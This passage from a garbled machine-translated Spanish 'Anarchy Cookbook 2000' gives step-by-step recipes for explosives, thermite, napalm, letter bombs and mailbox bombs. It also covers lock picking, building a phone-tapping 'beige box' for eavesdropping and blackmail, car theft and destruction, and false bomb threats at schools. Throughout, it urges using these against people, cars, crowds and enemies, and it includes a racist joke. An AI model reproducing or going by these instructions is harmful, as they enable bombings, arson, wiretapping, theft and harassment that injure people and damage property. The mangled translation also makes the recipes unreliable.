¿Así que quieres ser un criminal. Bueno, si quieren ser como James Bond y abrir una cerradura en quince segundos, y luego ir a Hollywood, Porque ese es el único lugar donde alguna vez se va a hacer. Incluso los cerrajeros experimentados pueden pasar de cinco a diez minutos en un bloqueo si no tienen suerte. Si estás interesado en un acceso extremadamente rápido, buscar en otra parte. Las siguientes instrucciones le

Page 13: 106652012 the Anarchy Cookbook 2000 Es

pertenecen sobre todo al "bloqueo en el mando" Tipo de bloqueo, ya que es el más fácil de recoger.

En primer lugar, usted necesita un juego de ganzúas. Si conoces a un cerrajero, lo llega a hacer que un conjunto. Este será el mejor conjunto posible para que usted utilice. Si usted encuentra un cerrajero dispuesto a proporcionar un conjunto, no perder la esperanza. Es posible hacer su propio, si usted tiene acceso a un molino (puede usar un archivo, pero se tarda una eternidad).

Lo que necesitas es un juego de llaves allen (muy pequeño). Estos deben ser lo suficientemente pequeño para caber en la ranura de ojo de cerradura. Ahora, dobla el extremo largo de la llave allen en un ligero ángulo (no 90 °). Ahora, tendrás que elegir a un molino o un archivo, y suavizar el final hasta que se completa por lo que no se colgará en el interior de la cerradura. Pon a prueba tu herramienta a cabo en pomos de las puertas de su casa para ver si se desliza dentro y fuera sin problemas. Ahora bien, esto es, donde el destornillador entra en juego debe ser lo suficientemente pequeño para él y su selección para ser utilizado en el mismo bloqueo al mismo tiempo, una sobre la otra. En las instrucciones que vienen, por favor consulte este cuadro del interior de una cerradura:______________________________ \ K | | | | | | / E | | | | \ Y [|] tumbador superior ^ ^ / H [^] vaso de Baja pines ^ ^ ^ ^ ^ ^ \ S [-] Cilindro de pared / L (Esta es una muy simplificado \ E dibujo)______________________________ /

El objeto consiste en presionar el pasador de modo que el espacio entre el pasador superior y el pasador inferior esté a nivel con la pared del cilindro. Ahora bien, si se presiona una pin up, su tendencia es a caer hacia abajo, ¿verdad? Ahí es donde entra en juego el destornillador Inserte el destornillador en la ranura y dar vuelta. Esta tensión se quedará con los pasadores "resueltos" de volver a caer hacia abajo. Ahora, trabajar desde la parte posterior de la cerradura en la parte delantera, y cuando haya terminado, habrá un solo clic, el destornillador gire libremente, y la puerta se abrirá.

No se desanime en su primer intento! Probablemente le llevará unos veinte a treinta minutos la primera vez. Después de eso, mejorará rápidamente con la práctica.

7. Bombas Solidox por The Jolly Roger

La mayoría de las personas no son conscientes de que un químico volátil, extremadamente explosivo se puede comprar sin receta: Solidox.

Solidox viene en una lata de aluminio con 6 palos de color gris, y se pueden comprar en K-Mart, y varias tiendas de suministro de hardware para alrededor de $ 7.00. Solidox se utiliza en aplicaciones de soldadura como un agente oxidante para la llama caliente necesaria para fundir el metal. El ingrediente más activo de Solidox es clorato de potasio, un material de relleno utilizado en muchas aplicaciones militares en la era de la Segunda Guerra Mundial.

Desde Solidox es literalmente lo que dice el nombre: oxígeno sólido, debe tener una fuente de energía de una explosión. La fuente de energía más común y fácil de conseguir es el azúcar común de la casa, o la sacarosa. En teoría, la glucosa sería la fuente de energía más pura, pero es difícil de encontrar una fuente sólida de la glucosa.

Haciendo la mezcla:

1. Abra la lata de Solidox, y eliminar todos los 6 palos. Uno por uno, moler cada uno de los palos (de preferencia con un mortero) en el polvo más fino posible.

Page 14: 106652012 the Anarchy Cookbook 2000 Es

2. La proporción de la mezcla del azúcar con la Solidox es de 1:1, por lo que pesa el polvo Solidox y moler la cantidad equivalente de azúcar.

3. Mezcle cantidades equivalentes de polvo de Solidox y el azúcar en una proporción de 1:1.

Es así de simple! Ahora tiene una sustancia muy potente que se puede utilizar en una variedad de aplicaciones. Una palabra de precaución: tener mucho cuidado en todo el proceso. Evite la fricción, el calor y las llamas. Hace unos años, un adolescente que sabía sopló 4 dedos de al tratar de hacer una bomba casera con Solidox. Usted ha sido advertido!

8. La venganza de alta tecnología: El Beigebox - Rev.2 por The Jolly Roger

I. Introducción¿Alguna vez has querido un auricular de técnico de? Sin duda, todos los Phreak ha al menos una vez considerado el Phun que pudiera tener con uno. Después de buscar en camiones de la compañía de teléfonos desbloqueados durante meses, tuvimos una idea. Podríamos construir una. Lo hicimos, y la llamó la "caja beige" simplemente porque ese es el color de la nuestra.

El beigebox es simplemente un auricular de técnico de los consumidores, que es un teléfono que se puede conectar a la parte exterior de la casa de una persona. Para fabricar una beigebox, siga adelante.

II. Construcción y UsoLa construcción es muy simple. En primer lugar hay que entender el concepto del dispositivo. En un enchufe modular, hay cuatro cables. Estos son rojo, verde, amarillo y negro. Para un teléfono de línea única, sin embargo, sólo dos de la materia: el rojo (del anillo) y verde (la punta). El amarillo y el negro no son necesarios para este proyecto. Un instalador de líneas de teléfono tiene dos clips en ella: el anillo y la punta. Tome una conexión modular y mirar a la parte inferior de la carcasa está. Debe haber una toma de color gris con cuatro alambres (rojo, verde, amarillo y negro) que sale de ella. Para el final del cable rojo adjuntar un clip de cocodrilo rojo. Para el extremo del alambre verde adjuntar una pinza cocodrilo verde. Los cables amarillo y negro se puede quitar, a pesar de que sólo dejarlas a un lado de modo que usted puede utilizar la conexión modular en futuros proyectos. Ahora inserte un enchufe modular de su teléfono en el enchufe modular. Eso es todo. Este modelo particular es agradable porque está puede hacerse fácilmente, es barato, utiliza partes comunes que son fácilmente disponibles, es pequeño, es ligero, y no requiere la destrucción de un teléfono.

III. Cuadro de Usos BeigeHay muchos usos para una caja de color beige. Sin embargo, antes de poder usarlo, usted debe saber cómo conectar el dispositivo de salida. Este dispositivo puede ser de cualquiera de Campana aparatos de conmutación que incluyen conjuntos germinales (es decir, remotos centros de conmutación, los jefes bridgin, latas, etc) Para abrir mayoría de los aparatos de conmutación telefónica de Bell, usted debe tener una llave hexagonal 7/16 pulgadas (o un buen par de pinzas de punta fina trabajar también) . Este equipo puede ser recogido en su ferretería local. Con el destornillador hexagonal (o pinzas), gire el tornillo de seguridad (s) de aproximadamente 1/8 de pulgada en sentido contrario y de código abierto. Si su dispositivo de salida está bloqueada, entonces usted debe tener algún conocimiento de la destrucción y / o abrir cerraduras. Sin embargo, nunca hemos encontrado un dispositivo de salida cerrada con llave. Una vez abierto el dispositivo de salida, usted debe ver una masa de cables conectados a los terminales. En la mayoría de los dispositivos de salida, los terminales deben ser etiquetados como "T" (Consejo - si no están etiquetados, por lo general es a la izquierda) y "R" (Anillo - si no están etiquetados, por lo general a la derecha).

Recuerde: Anillo - rojo - derecha. El "tres R" - una forma sencilla de recordar cuál es cuál. Ahora hay que adjuntar toda la pinza roja (anillo) de la "R" (anillo) del terminal. Conecte la pinza cocodrilo verde (Consejo) de la "T" (Consejo) del terminal.

Page 15: 106652012 the Anarchy Cookbook 2000 Es

Nota: si en lugar de un tono de llamada no se oye nada, ajustar las pinzas de cocodrilo para que no se están tocando entre otros terminales. También asegúrese de que estén firmemente adheridos. En ese momento usted debe oír un tono de marcado. Marque ANI para averiguar el número que está utilizando (que no quieres usar el suyo propio). Estas son algunas de las aplicaciones prácticas:

• Escuchas no autorizadas• Larga distancia, libre de estática, sin fone llama a phriends• Marcación directa a la teleconferencia Alianza (también hay estática)• Phucking personas mayores• Molestar al operador a poco riesgo para sí mismo• Blue boxeo con el azar reducido en gran medida de que los atrapen• Cualquier cosa que desee, ya que se encuentra en una extensión de esa línea

Escuchas no autorizadasPara ser más eficaz, en primer lugar colocar la caja beige, entonces su teléfono. Esto elimina la estática causada por la conexión de la caja, por lo tanto, la reducción de la sospecha potencial de su víctima. Cuando escuchas, siempre es mejor ser visto ni oído. Si usted oye a alguien llamando a cabo, no se asuste, pero en lugar de colgar, esperar, y levante el auricular de nuevo. La persona que ya sea se han colgado o tratado de completar su llamada. Si esto último es cierto, entonces escucha, y tal vez usted encontrará la información digna de chantaje! Si a usted le gustaría saber quién está escuchando, después de marcar ANI, tirar de un CN / A en el número.

Llamadas de larga distanciaEn esta sección se explica por sí mismo, pero no se olvide de marcar un "1" antes de que el NPA.

Directo de marcado para Alianza TeleconferenciaSólo tiene que marcar 0-700-456-1000 y recibirá las instrucciones desde allí. Yo prefiero este método más de PBX, PBX ya menudo tienen mala recepción y son más difíciles de conseguir.

La gente Phucking EnEste es un tema muy importante de la discusión. Sólo mediante el uso de los otros temas que se describen, puede crear una cuenta de teléfono grande para la persona (que no tendrá que pagar por ello, pero va a ser un gran problema para ellos). Además, ya que son una prolongación de la línea de la persona, se puede dejar el teléfono descolgado, y no será capaz de hacer o recibir llamadas. Esto puede ser muy desagradable, porque nadie esperaría que la causa del problema.

Molestar al operadorEsta es también explica por sí mismo y puede proporcionar horas de entretenimiento. Simplemente pregunte a sus cosas que son ofensivas o que no te gustaría localizar a su línea. Esto también corresponde a la sección se ha descrito anteriormente, Phucking gente. Después de todo, supongo que es la línea que se remonta a?

Azul BoxeoVer un archivo en azul boxeo para más detalles. Esta es una característica especialmente agradable si usted vive en un prefijo de ESS-equipada, ya que las llamadas son, una vez más, no remontarse a su línea de ...

IV. POSIBLES RIESGOS DE BOXEO BEIGEEl uso excesivo de la caja de color beige puede causar sospechas dentro de la Gestapo, y se traduce en problemas legales. Por lo cual, yo te recomiendo:

• Elija un lugar apartado para hacer su boxeo de color beige,• Usar más de un dispositivo de salida• Mantenga un perfil bajo (es decir, no publicar bajo su nombre real en un BBS

públicas con respecto a sus logros)

Page 16: 106652012 the Anarchy Cookbook 2000 Es

Con el fin de asegurarse de que el enemigo no ha estado dentro de su dispositivo de salida, le recomiendo que coloque un pedazo de cinta adhesiva transparente sobre la apertura del dispositivo de salida. Por lo cual, si se abre en su ausencia, la cinta se desplazará y usted será consciente del hecho de que alguien se ha introducido en su territorio.

Ahora, imaginen las posibilidades: un billete de dólar de teléfono $ 2000 para esa persona especial, 976 números de abundancia, incluso acosando al operador sin ningún riesgo para usted! Piense en ello como entrar en una casa de enemigos, y utilizando su teléfono para que el contenido de su corazón.

9. Cómo hacer una bomba de CO ² por la Jolly Roger

Usted tendrá que usar el primer cartucho, ya sea rodando o lo que sea. Con un clavo, forzar un agujero más grande para permitir que el polvo y la mecha para adaptarse con facilidad. Llene el cartucho con polvo negro y el paquete en el que muy bien tocando la parte inferior del cartucho sobre una superficie dura (me dijo que TAP no SLAM!). Inserte un fusible. Yo recomiendo una buena prueba de agua fusible de cañón, o un fusible de tipo M-80,pero los fusibles petardos trabajar, si se puede ejecutar como un hombre negro se extiende desde la policía después de haber violado a una muchacha blanca.) Ahora bien, la luz y correr como el infierno! Se hace maravillas con una hilera de buzones de correo (como las de los complejos de apartamentos), un coche (el lugar en el tanque de gasolina), una ventana de imagen (lugar en el alféizar de la ventana), una cabina de teléfono (lugar correcto en el teléfono), o cualquier otro lugar otra tortuosa. Esto lo lanza metralla, y puede hacer salir de un lío!

10. La termita II por Jolly Roger

La termita es una mierda desagradable. Esta es una manera buena y fácil de hacer. El primer paso es obtener algo de hierro-óxido (que es el óxido!). Esta es una buena manera de hacer grandes cantidades en poco tiempo:

• Obtener un convertidor DC como el usado en un juego de trenes. Cortar el conector de salida, separar los cables, y tira a ambos.

• Ahora se necesita un tarro de agua con una cucharada de cloruro de sodio (que es la sal!) Que se añade a la misma. Esto hace que el conductor del agua.

• A continuación, introduzca los dos cables en la mezcla (estoy asumiendo que usted conecta el convertidor en. ..) y dejar que repose durante cinco minutos. Uno de ellos se iniciará burbujeando más que el otro. Este es el positivo (+) cable. Si usted no hace esta prueba derecha, el producto final será el opuesto (químicamente) de óxido, que es ácido Rust. Usted no tiene uso para este aquí (aunque es útil).

• De todos modos, puso el clavo atado al cable positivo en el frasco. Ahora ponga el cable negativo en el otro extremo. Ahora vamos a reposar toda la noche y por la mañana raspar el óxido de la uña y repita la operación hasta que tienes un montón de moho en el fondo del vaso. Sea generoso con su colección de óxido. Si usted va a través de la molestia de hacer la termita, que también podría hacer un montón, ¿verdad?

• Ahora, retire el exceso de agua y vierta la solución costra sobre una bandeja para hornear galletas. Secar al sol durante unas horas, o durante la noche en el interior. Debe ser un color naranja-marrón (aunque lo he visto en muchos colores diferentes! A veces el color se jodió, ¿qué puedo decir ... pero sigue siendo el óxido de hierro!)

• Machacar el óxido en un polvo fino y se calienta en una olla de hierro fundido hasta que esté bien. Ahora mezclar el óxido de hierro puro, con limaduras de

Page 17: 106652012 the Anarchy Cookbook 2000 Es

aluminio puro que se pueden comprar o presentado por la mano de un tubo de aluminio o una barra. La proporción de óxido de hierro o el aluminio es de 8 gramos a 3 gramos.

• ¡Felicitaciones! Usted acaba de hacer termita! Ahora, a la luz ...

• Termita requiere una LOTE de calor (más de un soplete!) para encender. Sin embargo, la cinta de magnesio (que es una especie difícil de encontrar .. llamar a su alrededor) hará el truco. Se toma el calor de la combustión de magnesio a la luz la termita.

• Ahora, cuando veas el coche de su víctima, vierta una pila de tamaño de cincuenta centavos en la capucha, pegar la cinta en ella, y la luz la cinta con el soplete. Ahora se ríen mientras ve arder a través de la campana, el bloque, el eje de la, y el pavimento. TENGA CUIDADO! Las mezclas ideales puede vaporizar ACERO AL CARBONO! Otra idea es utilizar la termita para entrar en las cabinas telefónicas de pago en efectivo.

11. Toque de explosivos por la Jolly Roger

Esta es una especie de explosión leve, pero puede ser muy peligroso en grandes cantidades. Para hacer que toque explosivo (como la encontrada en un broche de presión-n-pop, pero más potente), el uso esta receta:

• Mezclar cristales de yodo en amoniaco hasta que los cristales de yodo no se disolverá en el amoníaco más. Vierta el exceso de amoníaco y se secan los cristales en una bandeja para hornear de la misma manera que secan la termita (en otras palabras, sólo deja reposar toda la noche!).

• Ten cuidado, porque estos cristales son ahora su toque explosivo. Enrolle cuidadosamente un montón en papel (me refiero con cuidado! Fricción establece el 'em!) Y lanzar a su alrededor .. bastante fuerte, ¿eh? Son divertidos para poner en la silla de alguien. Añadir un lastre peces pequeños para ellos y que pueden ser lanzados a gran distancia (bueno para las multitudes, los partidos de fútbol, conciertos, etc)

12. Cartas-bomba por parte de The Jolly Roger

• En primer lugar, tendrá que hacer una versión suave de la termita. Utilizar mi receta, pero rellenos de sustitución de hierro de la corrosión.

• Mezclar el hierro con los rellenos de aluminio en una proporción de 75% de aluminio a 25% de hierro. Esta mezcla se quemará violentamente en un espacio cerrado (tal como una envoltura). Esto nos lleva a nuestro siguiente ingrediente ...

• Vaya a la oficina de correos y comprar un aislado (con relleno) sobre. Ya sabes, el tipo que se doble capa. Se separan las capas y colocar la termita leve en la sección principal, donde la carta iría. Luego coloca polvo de magnesio en la capa exterior. No es tu bomba!

• Ahora a la luz ... esta es la parte complicada y difícil de explicar. Sólo seguir experimentando hasta que obtengas algo que funcione. El fusible es justo que toque explosivo que os he hablado en otro de mis archivos de la anarquía. Es posible que desee para envolver como un cigarrillo largo y luego se coloca en la parte superior de la envolvente en la capa externa (en la parte superior del magnesio en polvo). Cuando toque el explosivo se desgarra o se apretó aún difícil que se inflame el magnesio en polvo (una especie de luz de flash) y luego se quemará la termita leve. Si la termita no volar, al menos sería quemar la mierda de tu enemigo (que hace maravillas en la carne humana!).

Page 18: 106652012 the Anarchy Cookbook 2000 Es

13. Pinte las bombas por la Jolly Roger

Para hacer una bomba de dolor que usted sólo tendrá un dolor de metal con una tapa reutilizable, una bella pintura de colores brillantes (verde, rosa, púrpura, o un poco de color bruto es perfecto!), Y una cantidad de hielo seco. Coloque la pintura en la lata y luego dejar caer el hielo seco pulgadas rápidamente coloque la parte superior y luego de correr como el infierno! Con un poco de las pruebas se puede esta vez en una ciencia. Depende de la relación de hielo seco para pintar con el tamaño de la lata a lo lleno que está. Si usted está realmente enojado con alguien, se podría colocar en su puerta, llamar a la puerta y vuelva a ejecutar! La pintura volar por todo el lugar!

14. Formas de enviar un coche al infierno por el Jolly Roger

Hay 1001 formas de destruir un coche, pero me voy a cubrir sólo los que son los más divertidos (para ti), la más destructiva (para ellos), y la más difícil de rastrear (los policías).

• Termita lugar en la visera, la luz, y ver que se queme todo el camino a través de la acera!

• Pegue una bomba de CO ² a la campana, el eje, tanque de gas, la rueda, el silenciador, etc

• Ponga un tampón, la suciedad, el azúcar (esto es bueno!), Una pelota de ping pong, o casi cualquier cosa que se disuelve en el tanque de gasolina.

• Poner las patatas, las rocas, los plátanos, o cualquier cosa que se ajuste, en el tubo de escape. Use un palo de escoba para rellenar 'em up en el tubo de escape.

• Coloque un trapo largo en el tanque de gas y la luz que ...

• Robar una clave, copiar, reemplazar, y luego robar el estéreo.

• Entrar en el coche. Cortar una regla de metal delgado en una forma como ésta:

Deslice en la ventana exterior y seguir tirando hacia atrás hasta que coger el cable de la cerradura que debe abrir la puerta. Este dispositivo es también llamado Slim Jim. ¡Ahora el equipo de música, ecualizador, detector de radar, etc Ahora destruir el interior. (Un cuchillo afilado hace maravillas en los asientos!)

15. ¿Odias a la escuela? por The Jolly Roger

• Uno de mis favoritos para salir de una clase o dos es llamar a una amenaza de bomba. Diles que es en un armario. Después, tienen que comprobar a todos, mientras que usted puede escapar durante una hora o dos. Usted puede incluso colocar una bomba falsa (en cualquier taquilla sino la tuya!). Podrían cancelar la escuela por una semana mientras se investiga (por supuesto, usted probablemente tendrá que hacerlo en el verano).

• Obtener un poco de potasio puro o de sodio puro, lo puso en una cápsula, y tirar de la cadena en el inodoro (huele horrible! Apesta a toda la escuela!).

• Utilice una granada de humo en el pasillo.

Page 19: 106652012 the Anarchy Cookbook 2000 Es

• Roba las contraseñas de ordenador y llaves. O robar las tarjetas de las columnas 80 en el interior si son (gag) de IBM.

• Haz amigos con los estudiantes asistentes y les han cambiar sus calificaciones cuando los maestros de la mano en sus hojas de la burbuja de las boletas de calificaciones.

• Escupir el chicle en la alfombra de la biblioteca o lo que sea y se muele en la alfombra. Vea el grito de los conserjes!

• Dibujar en armarios o spraypaint en el edificio que el director es un fascista.

• Pegue una patata en el tubo de escape del coche del director.

• Usa tu imaginación!

16. Teléfono relacionados con actos de vandalismo por la Jolly Roger

Si usted vive donde hay líneas de metro, entonces usted será capaz de arruinar la vida de teléfono de alguien con mucha facilidad. Todo lo que debes hacer es ir a su casa y encontrar la caja de conexiones verde que interconecta su línea (y posiblemente algunos otros en el barrio) con las líneas principales. Estos se pueden encontrar casi en cualquier lugar, pero son por lo general por debajo del poste de teléfono más cercano. Tome una llave de tubo y aflojar la tuerca de la derecha. A continuación, sólo tener tijeras o un martillo o una bomba y destruir el interior y tire hacia arriba de su cable de teléfono. Ahora se corta en segmentos para que no se puede arreglar, pero debe ser reemplazado (No es una semana de trabajo para ellos!!)

17. Carretera interferencia de radar por la Jolly Roger

La mayoría de los conductores que quieren hacer un mejor tiempo en la carretera va a invertir en uno de los detectores de radar caros. Sin embargo, este dispositivo no funcionará contra una unidad de radar tipo en el que la señal de radar no está presente hasta que la policía tiene el coche en su punto de mira y aprieta el gatillo. Entonces es demasiado tarde para que disminuya la velocidad. Un método mejor es continuamente mermelada de cualquier señal de una señal de radar de los tuyos. He probado esta idea con la colaboración de un policía local y descubrió que su unidad lee los números al azar, cuando mi coche se acercó a él. Es sorprendentemente fácil de hacer un transmisor de baja potencia del radar. Un semiconductor maravillosa y pequeña llama diodo Gunn va a generar las microondas como fuente de la DC 5 a 10 voltios y encerrado en la cavidad del tamaño correcto (resonador). Un 8 a 3 regulador de la terminal puede ser utilizado para obtener este voltaje del sistema 12V de un coche. Sin embargo, la construcción correcta y sintonización de la cavidad es difícil sin un buen equipo de medición de microondas. Los radares de la policía habitualmente opera en la banda K a 22 gigahertz. O con mayor frecuencia en la banda X en 10 ½ 25 GHz. la mayoría de las alarmas de intrusión de microondas y detectores de movimiento (montado en las puertas automáticas en los supermercados y bancos, etc) contienen un tipo Gunn transmisor / receptor que transmite la combinación de unos 10 kilovatios a 10 ½ 25 GHz. Estas unidades funcionan perfectamente como inhibidores. Si no se puede conseguir a nivel local, escribir a los Asociados en el microondas Burlington,Massachusetts y pedirles información sobre los Gunnplexers 'para uso de radioaficionados. Al llegar la unidad se puede montar en una caja de plástico en el tablero o en un recinto resistente a la intemperie detrás de la rejilla de plástico. Encienda el poder, cuando en una carretera abierta. El aparato de radar no mermelada de al lado o detrás del coche, así que no van más allá de la trampa de exceso de velocidad del radar. Un fenómeno interesante que usted notará es que los pilotos que están delante de ustedes que están usando detectores llegará a los frenos cuando se aproxima a los signos metálicos de gran tamaño y puentes. Su señal está rebotando de esos objetos y provocar sus detectores de radar!

Page 20: 106652012 the Anarchy Cookbook 2000 Es

PD Si usted está interesado en este tipo de cosas, obtener una copia de la comunicación popular. Los anuncios de que le diga donde se puede obtener todo tipo de información sobre todo tipo de equipo limpio para todo tipo de cosas interesantes!

18. Bombas de humo por la Jolly Roger

Aquí está la receta para un infierno de una bomba de humo!

4 partes de azúcar6 partes de nitrato de potasio (salitre)

Calentar esta mezcla a fuego lento hasta que se derrita, revolviendo bien. Vierta en un recipiente el futuro y, antes de que solidifique, incrustar unos cuantos partidos en la mezcla para utilizar como fusibles. Una libra de este material se irá llenando una manzana entera con humo espeso y blanco!

19. Las bombas de Buzón de la Jolly Roger

1. Dos botella de un litro de cloro (hipoclorito de sodio debe contener)2. Una pequeña cantidad de azúcar3. Una pequeña cantidad de agua

Mezclar todos los tres de ellas en cantidades iguales para llenar aproximadamente 1/10 de la botella. Cierra la tapa y coloque en un buzón de correo. Es difícil creer que una pequeña explosión, literalmente, romper el buzón de correo a la mitad y lo enviará de 20 metros en el aire! Tenga cuidado de hacer esto, sin embargo, porque si te pillan, no corresponde a la persona cuyo buzón de correo que explotó a presentar cargos. Depende de la ciudad.

20. La forma más fácil de hilo caliente coches por la Jolly Roger

Entra en el coche. Mira debajo del tablero. Si es cerrado, que se olvide a menos que quiera para cortar a través de él. Si lo hace, hacerlo cerca de la ignición. Una vez que usted se atrasa o cerca de la mirada de encendido por dos cables de color rojo. En los coches más viejos de color rojo era el color estándar, si no, busque los dos pares. Cuando las encuentra, las cruza y despegar!

21. Cómo hacer napalm por la Jolly Roger

• Vierta un poco de gas en un recipiente de edad, o algún tipo de contenedor.• Obtener un poco de espuma de poliestireno y lo puso en el gas, hasta que el gas no

va a comer más. Debe tener un jarabe pegajoso.• Póngalo en el final de algo (no la toque!). El material utilizado dura mucho

tiempo!

22. Cómo hacer una bomba de fertilizante por The Jolly Roger

Ingredientes:

• Periódico• Fertilizantes (el tipo de producto químico, pulgar verde o ORCHO)• Algodón• Gasóleo

Haga una bolsa fuera del periódico y poner un poco de abono en la misma. Luego ponga algodón en la parte superior. Empape el algodón con combustible. A continuación, la luz

Page 21: 106652012 the Anarchy Cookbook 2000 Es

y correr como nunca has corrió delante! Esta golpes hasta 500 pies cuadrados, así que no lo haga en un callejón!

23. Las bombas de tenis balón por el Jolly Roger

Ingredientes:

• Los fósforos• Una pelota de tenis• Un buen cuchillo afilado• La cinta adhesiva

Romper una tonelada de matchheads fuera. A continuación, corte un pequeño agujero en la pelota de tenis. Rellene todos los matchheads en la bola, hasta que ya no caben más pulg Luego cinta sobre con cinta adhesiva. Asegúrese de que es muy bonito y apretado! Entonces, cuando usted ve un geek caminando por la calle, le dan un buen tiro. Él tendrá una maravilla!

24. Diskette bombas por The Jolly Roger

Es necesario:

• Un disco• Tijeras• Blanco o azul cerillas de cocina (deben ser estos colores!)• Esmalte de uñas transparente

1. Con cuidado abre el disco (3 ½ "los discos son los mejores para esto!)2. Quitar el algodón que cubre desde el interior.3. Raspar una gran cantidad de polvo de fósforo en un tazón (utilice un raspador de

madera, el metal puede provocar el matchpowder!)4. Después de que usted tiene un montón, que distribuye uniformemente en el disco.5. Usando el esmalte de uñas, se extendió sobre la mezcla de partido6. Deje secar7. Coloque con cuidado el disco de nuevo y utilizar el esmalte de uñas para sellarlo

en el interior (de donde vino aparte).

Cuando ese disco se encuentra en una unidad, el cabezal de la unidad intenta leer el disco, lo que provoca un pequeño incendio (suficiente calor para derretir LA UNIDAD DE DISCO Y MIERDA LA CABEZA ARRIBA!). Deje que el fuckhead tratar de arreglar eso!

25. Números de teléfono no listados de The Jolly Roger

Hay un par de maneras diferentes de hacer esto. Vamos a ver si éste le ayudará a: Todas las ciudades tienen uno o más centros dedicados a la asignación de números a los pares telefónicos de cable. Estas oficinas se llaman las oficinas de DPAC y están disponibles para los representantes de servicio que van a instalar o reparar los teléfonos. Para obtener el número de DPAC, un representante de servicio al que llamar al número de servicio al cliente para obtener información de facturación en la ciudad que el número se encuentra en que él está tratando de obtener el número privado de. (¿Tienes que) La conversación podría ser algo como esto: "Hola, Amarillo, Este es Joe de oficina de negocios de cualquier ciudad, necesito el número DPAC para el lado sur de la ciudad. "Esta información generalmente se transmite a cabo sin problemas, así que ... si la primera persona que llama no lo tiene, intente con otro . Recuerde que nadie tiene idea de quién demonios es usted cuando usted está hablando por teléfono, por lo que puede ser cualquier persona que dé la real gana! Cuando usted llame al número de DPAC, sólo les digo que se necesita una lista, ya sea para la dirección que usted tiene, o el nombre. DPAC NO SE PRESENTA si el número está cotizadas o no! Además, si usted va a hacer un hábito de perseguir a los números hacia abajo, es posible que desee ver en

Page 22: 106652012 the Anarchy Cookbook 2000 Es

conseguir un directorio en cruz, que enumera los números de teléfono de sus direcciones. Su precio es de unos cientos de dólares, pero está bien vale la pena si tienes que perseguir más de uno o dos números de abajo!

26. Fusibles de The Jolly Roger

Usted se sorprenderá de cuántos archivos están ahí fuera que el uso de lo que cae bajo la categoría de un "fusible". Ellos asumen que acaba de tener una altitud en torno a unos pocos, o sabe dónde conseguirlos. Pues bien, en algunas partes del país, los fusibles son extremadamente difíciles de conseguir ... por lo que este archivo le indica cómo hacer su propio. Tanto los fusibles que se presentan aquí son bastante simples de hacer, y son bastante confiables.

Espoleta retardada - 2 pulgadas por minuto

Materiales necesarios:

• Algodón cadena o cordones de los zapatos 3• Nitrato de potasio o clorato de potasio• Azúcar granulada

Procedimiento:

1. Lave la cadena de algodón o cordones de los zapatos con agua caliente jabonosa y luego enjuague con agua fresca

2. Mezclar la siguiente en un tazón de vidrio:• 1 parte de nitrato de potasio o clorato de potasio• 1 parte de azúcar granulada• 2 partes de agua caliente

3. Remoje cuerdas o cordones de zapatos en esta solución

4. Twist / trenza de 3 cabos y dejar que se sequen

5. Compruebe la velocidad de combustión para ver cuánto tiempo toma realmente!

FUSE BURNING - 40 pulgadas por minuto

Materiales necesarios:

• Hilo de algodón suave• Polvo fino negro (vaciar unos cuantos cartuchos de escopeta!)• Plato hondo o en una cazuela

Procedimiento:

1. Humedezca polvo para formar una pasta.

2. Twist / trenza de 3 hilos de algodón juntos.

3. Frote pegarlo en cadena y dejar secar.

4. Compruebe la velocidad de combustión!

27. Cómo hacer nitrato de potasio por el Jolly Roger

Page 23: 106652012 the Anarchy Cookbook 2000 Es

El nitrato de potasio es un ingrediente en la fabricación de fusibles, entre otras cosas. Así es como usted lo hace:

Materiales necesarios:

• 3 ½ galones de nitrato de tierra u otro material de apoyo• ½ taza de cenizas de madera• Cubo o recipiente similar de 4-5 litros de volumen• 2 piezas de tela de tejido fino, cada uno un poco más grande que la parte inferior

de la cubeta• Plato poco profundo o molde al menos tan grande en diámetro que la cubeta• Recipiente poco profundo, resistente al calor• 2 galones de agua• Algo para hacer agujeros en el fondo de la cubeta• 1 galón de cualquier tipo de alcohol• Una fuente de calor• Papel y cinta

Procedimiento:

1. Hacer agujeros en la parte inferior interior de la cubeta, de manera que el metal es "arrugada" hacia fuera desde la parte inferior.

2. Extienda un paño sobre los agujeros de la parte inferior.

3. Coloque las cenizas de madera sobre la tela. Corre hacia fuera de manera que cubra toda la tela y tiene aproximadamente el mismo grosor.

4. Coloque un paño segundo en la parte superior de las cenizas de madera.

5. Colocar la suciedad u otro material en el cubo.

6. Coloque el recipiente sobre el recipiente poco profundo. NOTA: Es posible que necesite apoyo en la parte inferior de modo que los agujeros en el fondo no están bloqueadas.

7. Hierva el agua y se vierte sobre la tierra muy lentamente. No los arroje a la vez, ya que esto va a obstruir el filtro en la parte inferior.

8. Deje correr el agua a través de agujeros en el plato llano en la parte inferior.

9. Asegúrese de que el agua pasa por todos los de la tierra!

10. Deje que el agua en el plato se enfríe durante una hora o así.

11. Cuidadosamente drenar el líquido en el plato de distancia, y desechar los lodos en la parte inferior.

12. Hervir este líquido sobre un fuego durante al menos dos horas. Pequeños granos de sal se forman - sacar esto a cabo con el papel como se forman.

13. Cuando el líquido se ha reducido a ½ de su volumen original dejar que repose.

14. Después de media hora, añadir volumen igual del alcohol; cuando esta mezcla se vierte a través de papel, pequeños cristales blancos. Este es el nitrato de potasio.

Purificación:

1. Redisolver cristales en pequeña cantidad de agua hirviendo.

Page 24: 106652012 the Anarchy Cookbook 2000 Es

2. Retire todos los cristales que aparecen.

3. Vierta a través de improvisada solución de filtro de entonces el calor concentrado a sequedad.

4. Extienda los cristales y dejar secar.

28. Exploding bombillas por The Jolly Roger

Materiales necesarios:

• Bombilla (100w)• Socket (duh. ..)• ¼ de taza de jabón de los chips• Pólvora negra! (Abrir algunos cartuchos de escopeta!)• ¼ de taza de keroseno o gasolina• Cinta adhesiva• Más ligero o pequeño soplete• Pegamento

Procedimiento para la explosión de una bombilla sencilla:

1. Perfore un pequeño agujero en la parte superior de la bombilla cerca de los temas!

2. Vierta cuidadosamente la pólvora en el agujero. Use suficiente para que toque el filamento!

3. Insertar en el receptáculo de forma normal (asegúrese de que la luz está apagada o de lo contrario será la víctima!)

4. Vete al infierno!

Procedimiento para una bombilla de Napalm:

1. El calor de queroseno / gasolina en una caldera doble.

2. Derretir escamas de jabón, removiendo lentamente.

3. Poner en algún lugar y dejar enfriar.

4. Calentar los hilos de la bombilla muy cuidadosamente para fundir el pegamento. Retirar los hilos, poco a poco sacando el filamento. No rompa las encendedores eléctricos baratos y / o filamentos o este no va a funcionar!

5. Vierta el líquido en el bulbo, y baje lentamente el filamento hacia abajo, hacia el bulbo. Asegúrese de que el filamento se sumerge en el fluido.

